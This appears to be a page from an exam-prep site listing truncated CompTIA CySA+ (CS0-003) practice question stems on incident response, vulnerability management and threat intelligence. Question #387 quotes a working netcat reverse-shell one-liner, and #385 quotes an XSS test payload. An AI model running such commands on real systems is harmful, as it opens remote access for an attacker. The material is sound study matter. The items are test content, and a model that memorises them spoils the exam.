CS0-003 Exam Questions
658 real CS0-003 exam questions with expert-verified answers and explanations. Page 8 of 14.
- Question #357 (Security operations)
  An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and fire...
  Tags: Cyber Kill Chain, command and control, network anomalies
- Question #358 (Incident Response and Management)
  An organization's email account was compromised by a bad actor. Given the following information: Which of the following is the length of time the team took to detect the threat?
  Tags: Incident detection, time metrics, log analysis
- Question #359 (Security operations)
  A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the followi...
  Tags: Threat hunting, persistence mechanisms, malware analysis
- Question #360 (Security operations)
  A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
  Tags: Network scanning, precursors to attack, threat detection
- Question #361 (CompTIA A+ / IT Fundamentals - Operational Procedures: Demonstrate the ability to use proper communication and documentation techniques, apply troubleshooting methodology, and identify the root cause of escalated help desk issues to provide effective resolution.)
  SIMULATION. Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue. INSTRUCTIONS: Click on the ticket to see the ticket det...
  Tags: Help Desk Troubleshooting, Root Cause Analysis, Ticket Escalation, IT Support Methodology
- Question #362 (CompTIA Security+ Domain 4.0 - Security Operations: Applying appropriate incident response procedures, analyzing indicators of compromise, and implementing controls mapped to attack lifecycle stages to improve organizational security posture.)
  SIMULATION. A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire co...
  Tags: Incident Response, Threat Intelligence, Kill Chain Analysis, Security Controls
- Question #363 (Vulnerability Management)
  An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/...
  Tags: CVSS, vulnerability metrics, exploit maturity
- Question #364 (Incident Response and Management)
  A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network...
  Tags: incident response, containment, IR lifecycle
- Question #365 (Security operations)
  A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below: Wh...
  Tags: SIEM analysis, PowerShell, command-line analysis, attacker intent
- Question #366 (Security operations)
  When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing hos...
  Tags: process analysis, incident investigation, anomalous behavior
- Question #367 (Incident Response and Management)
  Which of the following evidence collection methods is most likely to be acceptable in court cases?
  Tags: forensic evidence, chain of custody, bit-level image
- Question #368 (Incident Response and Management)
  A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
  Tags: incident response, recovery, forensic analysis, IR lifecycle
- Question #369 (Security operations)
  While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most...
  Tags: dynamic analysis, ASLR, exploit mitigation
- Question #370 (Incident Response and Management)
  A company brings in a consultant to make improvements to its website. After the consultant leaves, a web developer notices unusual activity on the website and submits a suspicious...
  Tags: Backdoor, Malicious code, Web security, Persistence
- Question #371 (Security operations)
  Which of the following makes STIX and OpenIOC information readable by both humans and machines?
  Tags: STIX, OpenIOC, threat intelligence, XML
- Question #372 (Vulnerability Management)
  An analyst is evaluating the following vulnerability report: Which of the following vulnerability report sections provides information about the level of impact on data confidentia...
  Tags: vulnerability reporting, CVSS, confidentiality impact
- Question #373 (Security operations)
  Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?
  Tags: TAXII, threat intelligence, information sharing, automation
- Question #374 (Incident Response and Management)
  During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while p...
  Tags: rogue access point, incident response, containment, evidence preservation
- Question #375 (Security operations)
  While a security analyst for an organization was reviewing logs from web servers, the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of o...
  Tags: TLS, HTTPS, padding oracle attack, cipher suites
- Question #376 (Incident Response and Management)
  An analyst views the following log entries: The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly rep...
  Tags: Incident Response, Log Analysis, Access Control, Incident Prioritization
- Question #377 (Security operations)
  An analyst is conducting monitoring against an authorized team that will perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the t...
  Tags: purple team, red team, blue team, security exercise
- Question #378 (Reporting and Communication)
  The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate?
  Tags: incident communication, trade secret, legal requirements
- Question #379 (Incident Response and Management)
  During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an in...
  Tags: PII protection, data encryption, access control, incident investigation
- Question #380 (Security operations)
  A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the a...
  Tags: SQL injection, web application firewall, web security
- Question #381 (Security operations)
  Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant?
  Tags: formal methods, embedded systems, ICS security, software assurance
- Question #382 (Security operations)
  A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would be...
  Tags: continuous monitoring, rogue access points, network security, asset inventory
- Question #383 (Vulnerability Management)
  An analyst needs to provide recommendations based on a recent vulnerability scan: Which of the following should the analyst recommend addressing to ensure potential vulnerabilities...
  Tags: Vulnerability Scanning, Scan Configuration, Privilege Escalation (Scanning), Vulnerability Identification
- Question #384 (Vulnerability Management)
  A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output: [+] XSS: I...
  Tags: Vulnerability Assessment, Web Application Security, Cross-Site Scripting (XSS), Security Headers
- Question #385 (Vulnerability Management)
  A security analyst found the following vulnerability on the company's website: <INPUT TYPE="IMAGE" SRC="javascript:alert(`test');"> Which of the following should be implemented to...
  Tags: XSS, input sanitization, web security, vulnerability remediation
- Question #386 (Security Operations)
  A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does...
  Tags: Cyber Kill Chain, weaponization, logic bomb, sabotage
- Question #387 (Security Operations)
  A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely de...
  Tags: reverse shell, command line, network connections, incident detection
- Question #388 (Security Operations)
  After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have cons...
  Tags: change management, testing, patching, system updates
- Question #389 (Vulnerability Management)
  A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vu...
  Tags: vulnerability scanning, patch prioritization, risk assessment, web server security
- Question #390 (Security Operations)
  Which of the following most accurately describes the Cyber Kill Chain methodology?
  Tags: Cyber Kill Chain, attack methodology, threat intelligence
- Question #391 (Incident Response and Management)
  Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
  Tags: Diamond Model, intrusion analysis, threat intelligence, knowledge gaps
- Question #392 (Incident Response and Management)
  Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
  Tags: incident response plan, incident declaration, roles and responsibilities
- Question #393 (Vulnerability Management)
  A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the...
  Tags: vulnerability prioritization, CVSS, risk metrics, vulnerability management
- Question #394 (Incident Response and Management)
  Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used t...
  Tags: forensic evidence, chain of custody, mobile forensics, tamper-evident
- Question #395 (Security Operations)
  An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the fi...
  Tags: data enrichment, firewall logs, troubleshooting, certificates
- Question #396 (Security Operations)
  A security analyst noticed the following entry on a web server log: Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was most l...
  Tags: web server logs, SSRF, web application attacks, incident detection
- Question #397 (Security Operations)
  A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log: Which of the following is most likely occurring, based on...
  Tags: log analysis, vulnerability scanning, reconnaissance, adversary TTPs
- Question #398 (Vulnerability Management)
  An XSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a...
  Tags: XSS vulnerability, web application security, vulnerability remediation, WAF
- Question #399 (Incident Response and Management)
  An organization has tracked several incidents that are listed in the following table: Which of the following is the organization's MTTD?
  Tags: MTTD, incident metrics, incident response, security metrics
- Question #400 (Vulnerability Management)
  During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-pa...
  Tags: vulnerability management, risk mitigation, compensating controls, software supply chain
- Question #401 (Reporting and Communication)
  Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a be...
  Tags: incident communication, public relations, legal compliance, stakeholder management
- Question #402 (Vulnerability Management)
  A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?
  Tags: Nikto scan, vulnerability scanning, web application security, investigation
- Question #403 (Vulnerability Management)
  Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered....
  Tags: vulnerability management, asset management, configuration management, patch management
- Question #404 (Vulnerability Management)
  A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the r...
  Tags: vulnerability remediation, risk acceptance, change freeze, business constraints
- Question #405 (Vulnerability Management)
  An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst r...
  Tags: application security testing, penetration testing, dynamic analysis, black box testing
- Question #406 (Incident Response and Management)
  An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data befo...
  Tags: Root cause analysis, Log analysis, Incident response steps, Data exfiltration